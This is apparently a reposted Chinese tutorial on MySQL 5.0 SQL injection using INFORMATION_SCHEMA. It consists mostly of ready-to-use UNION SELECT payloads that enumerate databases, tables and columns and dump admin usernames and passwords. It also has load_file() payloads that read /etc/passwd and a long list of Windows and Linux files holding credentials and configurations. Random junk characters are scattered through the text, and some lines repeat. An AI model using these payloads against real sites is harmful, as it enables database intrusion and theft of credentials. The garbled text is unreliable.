mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。



7 `0 s$ K  c# q* rMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
0 b& ?1 I9 x1 U9 S4 N3 }! F中记录了Mysql中所有
6 P9 g: u, I* t" G9 I存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
, M' |. w; z2 r  C+ M4 w0 S1.得到所有数据库名：
& v, i* ]' T. J|SCHEMATA ->存储数据库名的表
3 T2 a  ^* `' e) V2 H3 Q% N2 [0 j|—字段：SCHEMA_NAME ->数据库名称

|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名
3 a5 M, C" L8 |) {. c/ @/ ~
9 W2 z- a* z0 k, q- m+ s|COLUMNS ->存储的字段名表
6 O% A8 e" V: e, N/ A0 {. c1 y0 P|—字段：TABLE_SCHEMA ->该字段所属数据库名
|—字段：TABLE_NAME ->存储所属表的名称

|—字段：COLUMN_NAME ->该字段的名称
9 v- f% @# n# _
#########################################################################
##
* K: o2 @: L9 e- j
0×001 获取系统信息:

union select 1,2,3,4,5,concat
2 I9 U/ V) y  U7 y- w( g(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
. |+ Y2 f4 G' B2 O
9 e2 m4 o5 ]! q2 k/*

@@global.version_compile_os 获取系统版本
0 t4 k! r, P0 H
@@datadir 数据库路径
database() 当前数据库名称
0x3c62723e 换行HEX值
/ c, m. p/ b* {. Q9 [3 m, j" x
0 E- I1 g: H0 z7 O# [*/

) b) Y1 r' }$ `2 K* E######################################################################
; I8 R. Y. c2 C' t
/ q6 _. j5 w6 G% L8 c0×002 获取表名

* |( N& N& A  X# l7 S; Junion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
9 ?/ E- g& C8 H" einformation_schema.tables where table_schema=0x67617264656e /*
, T/ x2 n! o$ {" h$ z$ P8 D
! |( X# `! D% P& u7 I! ]. R/*

! l7 V* Q* D/ e; H  N& D( b) }7 E0x67617264656e 为当前数据库名
) @( A4 \( v4 C) e$ m1 l' i( D
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
0 ~1 E; m+ P4 n: e( v
$ m! G' M7 c" [5 Y*/
  C1 L  B2 `' a7 z
######################################################################
1 ?. E. g8 K, k
0×003 获取字段
' P  I) Q* X7 i! @+ g. @1 A, Q
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and


table_schema=0x67617264656e limit 1 /*

/*

: g9 J8 ^- X8 {& T! Vgroup_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段
  u& y; R/ n  g* K5 X- X" q
* c5 m1 d9 ~7 ^' D) g0x61646d696e ->选择一个表

; n8 _, b+ \% H6 l. [1 ~0x67617264656e ->数据库名
* w, V& K) [5 U* R
4 M# E. A+ X* d5 `*/

+ n) [; I2 i# A( n' N. n5 k+ e#####################################################################

( I/ n- b8 S( i# ]0×004 获取数据
, [5 M. s8 _+ c* U
union select 1,2,3
% [# B7 |) s! w3 S; V' s: w( R,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
) p, w& j3 l6 u; u
1 p/ k% c; ~$ O$ wunion select 1,group_concat(id),group_concat(adname),4,5,group_concat
. a; p" b: h2 z0 m5 ]! c: f% X+ S(adpassword),6,7,8 from admin

% k0 W7 t9 _2 v+ b, k" r8 h/*

0x3c62723e 换行符号HEX编码

group_concat 同时获得该字段所有数据
/ g4 K0 i$ ]: q: [8 a, l+ x* }
*/


& Q; F# a& F& f5 J" ?/ D
* g: m8 z8 i. D6 a* l0 i: Y
6 `' `, ?# u3 X' C* h7 R
1 e' i: r4 p( E, c顺便添加一些mysql注入时非常有用的一些东西
8 @/ E! H7 N0 L$ T% E: F7 N  [
简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

7 Z% p) ^: T7 W4 L1:system_user() 系统用户名
; }+ N# f  a( L) j2 z4 U2:user()        用户名
) k8 S" F6 v- X8 J5 d3:current_user()  当前用户名
  {* h# `+ j! c6 n  q% W/ w4:session_user()连接数据库的用户名
5:database()    数据库名
. G# X1 v% N/ l! v+ M2 Q2 l8 N( v6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
8@datadir     读取数据库路径
. l- Z( n+ ~/ f8 K8 ~9 a9@basedir    MYSQL 安装路径
10@version_compile_os   操作系统  Windows Server 2003,
收集的一些路径：
WINDOWS下:
c:/boot.ini          //查看系统版本
c:/windows/php.ini   //php配置信息
& G$ q  N% r, T) G5 @3 dc:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
) u, @3 x0 d. i2 o& _3 x* \! G- Jc:/winnt/php.ini
" W: @$ g& D1 R, j* Oc:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
) m6 t9 Y! C' [2 l  D+ Mc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
) t* H- U- `( Y3 y# H+ wc:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
7 W9 p  t/ a- c) V0 Zc:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
& Y5 w, c! L9 yC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
$ X: E% ?" D! w: H" _+ ?2 p% X//存储了pcAnywhere的登陆密码
; s8 V3 n# h3 N- F# hc:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.


c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
! U& Q! j2 }( U6 l3 K1 ^' @( hC:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
0 K9 T. ^! C+ P  @9 Q
+ N9 d% I) G( T2 oLUNIX/UNIX下:
9 P* l. b% q3 k# `( o/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
: ], j: L- s- s6 l/usr/local/apache2/conf/httpd.conf
# M" Q* V. O/ T7 _4 F6 j/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
# X# _( f' M1 f" [1 |( n9 n/etc/httpd/conf/httpd.conf // apache配置文件
+ h4 E! @  c" A/etc/rsyncd.conf //同步程序配置文件
) ^% z3 t0 W" A. r% {: D/ H) z/etc/my.cnf //mysql的配置文件
  S2 y; P+ u! y5 s/etc/redhat-release //系统版本
: X% m* i- W9 r/etc/issue
& b5 {5 ]; x9 f/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
. i% o. K% {% R/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
- \' J8 A& `5 P+ y/ S, F' v5 t0 `/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
2 b& s: r1 T" H. ?/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
' I; f6 c, p8 ereplace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.